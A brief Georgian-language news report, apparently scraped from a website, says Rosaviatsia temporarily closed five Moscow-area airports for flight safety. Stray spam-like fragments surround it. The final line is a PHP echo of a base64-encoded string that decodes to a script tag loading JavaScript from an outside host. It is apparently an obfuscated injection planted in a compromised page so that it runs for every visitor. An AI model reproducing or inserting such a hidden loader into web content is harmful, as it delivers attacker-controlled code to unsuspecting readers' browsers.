tube
ავერსი jaluzi

მოსკოვში და მახლობლად 5 აეროპორტი დაიხურა. ამის შესახებ განცხადებას რუსეთის საჰაერო ტრანსპორტის ფედერალური სააგენტო (როსავიაცია) ავრცელებს.

განცხადების თანახმად, “ფრენების უსაფრთხოების უზრუნველსაყოფად” მოსკოვსა და მახლობლად მდებარე 5 აეროპორტში დროებით არ ხდება რეისების გაფრენა და მიღება.

შეზღუდვები შეეხო: შერემეტიევოს აეროპორტს, დომოდედოვოს აეროპორტს, ვნუკოვოს აეროპორტს, ჟუკოვსკის აეროპორტსა და კალუგას აეროპორტს.

“სამოქალაქო საჰაერო ხომალდების ფრენების უსაფრთხოების უზრუნველსაყოფად დროებითი შეზღუდვებია შემოღებული შერემეტიევოს, დომოდედოვოს, ვნუკოვოს, ჟუკოვსკისა და კალუგას აეროპორტების მუშაობაში”, - ნათქვამია განცხადებაში.

129
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");